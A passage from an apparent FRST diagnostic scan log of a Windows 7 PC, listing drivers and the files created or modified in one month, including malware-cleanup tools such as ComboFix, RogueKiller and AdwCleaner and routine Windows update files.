S3 libusb0; C:\Windows\System32\DRIVERS\libusb0.sys [44480 2011-05-17] (http://libusb-win32.sourceforge.net)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-11-03] ()
R3 ViWDM; C:\Windows\System32\DRIVERS\ViWDM.SYS [14336 2012-03-07] (Primax Electronics Ltd.)
R3 vrvd5; C:\Windows\System32\DRIVERS\vrvd5.sys [13344 2014-04-15] (Rsupport Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 18:13 - 2014-11-07 18:13 - 14439144 _____ (Malwarebytes Corp.) C:\Users\Ryan\Desktop\mbar-1.08.0.1001.exe
2014-11-07 16:07 - 2014-11-07 16:07 - 00328126 _____ () C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe_20141107.160712.11600.log
2014-11-07 16:06 - 2014-11-07 16:07 - 00328192 _____ () C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe_20141107.160632.9176.log
2014-11-07 15:57 - 2014-11-07 15:57 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\Ryan\Desktop\tdsskiller.exe
2014-11-07 15:57 - 2014-11-07 15:57 - 00186568 _____ (ESET) C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe
2014-11-07 15:53 - 2014-11-07 15:53 - 00000000 ___RD () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-03 21:28 - 2014-11-03 21:28 - 00002159 _____ () C:\Users\Ryan\AppData\Local\recently-used.xbel
2014-11-03 20:24 - 2014-11-03 20:25 - 00000000 ____D () C:\Users\Ryan\AppData\Local\{9B1BF085-634B-426D-BDB3-489C0053B60E}
2014-11-03 18:29 - 2014-11-03 18:29 - 00000632 _____ () C:\Users\Ryan\Desktop\JRT.txt
2014-11-03 18:26 - 2014-11-03 18:26 - 01706359 _____ (Thisisu) C:\Users\Ryan\Desktop\JRT.exe
2014-11-03 18:25 - 2014-11-03 18:25 - 00000730 _____ () C:\Users\Ryan\Desktop\AdwCleaner[S0].txt
2014-11-03 18:20 - 2014-11-03 18:22 - 00000000 ____D () C:\AdwCleaner
2014-11-03 18:20 - 2014-11-03 18:20 - 01375089 _____ () C:\Users\Ryan\Desktop\AdwCleaner.exe
2014-11-03 18:19 - 2014-11-03 18:19 - 00004981 _____ () C:\Users\Ryan\Desktop\RKreport_SCN_11032014_181839.log
2014-11-03 18:14 - 2014-11-03 18:14 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-03 18:14 - 2014-11-03 18:14 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-03 18:13 - 2014-11-03 18:13 - 14670424 _____ () C:\Users\Ryan\Desktop\RogueKiller.exe
2014-11-03 15:20 - 2014-11-03 15:20 - 00019461 _____ () C:\ComboFix.txt
2014-11-03 15:11 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-03 15:11 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-03 15:11 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-03 15:09 - 2014-11-03 15:20 - 00000000 ____D () C:\Qoobox
2014-11-03 15:09 - 2014-11-03 15:19 - 00000000 ____D () C:\Windows\erdnt
2014-11-03 15:08 - 2014-11-03 15:08 - 05591672 ____R (Swearware) C:\Users\Ryan\Desktop\ComboFix.exe
2014-11-02 22:52 - 2014-11-02 22:52 - 00002392 _____ () C:\Users\Ryan\Desktop\aswMBR.txt
2014-11-02 22:52 - 2014-11-02 22:52 - 00000512 _____ () C:\Users\Ryan\Desktop\MBR.dat
2014-11-02 22:25 - 2014-11-02 22:26 - 05192704 _____ (AVAST Software) C:\Users\Ryan\Desktop\aswMBR.exe
2014-11-02 22:23 - 2014-11-07 18:13 - 00014096 _____ () C:\Users\Ryan\Desktop\FRST.txt
2014-11-02 22:23 - 2014-11-07 17:47 - 00024924 _____ () C:\Users\Ryan\Desktop\Addition.txt
2014-11-02 22:18 - 2014-11-07 18:13 - 00000000 ____D () C:\FRST
2014-11-02 22:17 - 2014-11-02 22:18 - 02114560 _____ (Farbar) C:\Users\Ryan\Desktop\FRST64.exe
2014-11-01 22:30 - 2014-11-01 22:31 - 00001058 _____ () C:\DelFix.txt
2014-10-30 20:53 - 2014-11-01 22:30 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 00:30 - 2014-10-30 00:30 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-10-30 00:28 - 2014-10-30 00:28 - 00000000 ____D () C:\RegBackup
2014-10-30 00:27 - 2014-10-30 00:27 - 00002246 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-10-29 18:45 - 2014-10-29 18:45 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Mozilla
2014-10-15 15:38 - 2014-10-15 15:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-14 19:39 - 2014-10-20 21:01 - 00000000 ____D () C:\Users\Ryan\Desktop\masque of red death
2014-10-14 15:21 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 15:21 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 15:21 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 05552056 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 15:21 - 2014-07-06 20:41 - 03975096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 15:21 - 2014-07-06 20:41 - 03919288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 15:20 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 15:20 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 15:20 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 15:20 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 15:20 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 15:20 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 15:20 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 15:20 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 15:20 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 15:20 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 15:20 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 15:20 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 15:20 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 15:20 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 15:20 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 15:20 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 15:20 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 15:20 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 15:20 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 15:20 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 15:20 - 2014-08-18 22:08 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 15:20 - 2014-08-18 22:08 - 00617376 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 15:20 - 2014-08-18 22:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 15:20 - 2014-08-18 22:05 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 15:20 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 15:20 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 15:20 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 15:20 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00533200 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 15:19 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 15:19 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 15:19 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 15:19 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 15:19 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 15:19 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 15:19 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 15:19 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 15:19 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 15:19 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 15:19 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 15:19 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 15:19 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 15:18 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 15:18 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 15:17 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 15:17 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 15:17 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 15:17 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 15:17 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 15:17 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 17:43 - 2012-06-09 02:40 - 01546012 _____ () C:\Windows\WindowsUpdate.log
2014-11-07 17:39 - 2012-01-02 04:18 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-07 17:36 - 2013-10-27 14:17 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
2014-11-07 17:36 - 2013-10-27 14:17 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
2014-11-07 15:53 - 2012-08-05 23:52 - 00000000 ____D () C:\Users\Ryan\Documents\Bluetooth Folder
2014-11-06 16:18 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-06 16:18 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-06 16:11 - 2012-05-04 13:49 - 00073946 _____ () C:\Windows\setupact.log
2014-11-06 16:11 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-05 17:45 - 2009-07-14 00:13 - 00006214 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 15:31 - 2012-08-10 11:38 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps
2014-11-03 21:28 - 2012-11-08 14:14 - 00000000 ____D () C:\Users\Ryan\.gimp-2.8
2014-11-03 18:23 - 2012-05-18 18:17 - 00264590 _____ () C:\Windows\PFRO.log
2014-11-03 15:18 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan
2014-11-03 15:18 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2014-11-01 17:00 - 2013-10-16 05:44 - 00000000 ____D () C:\Users\Ryan\Documents\Postcolonial Medicine
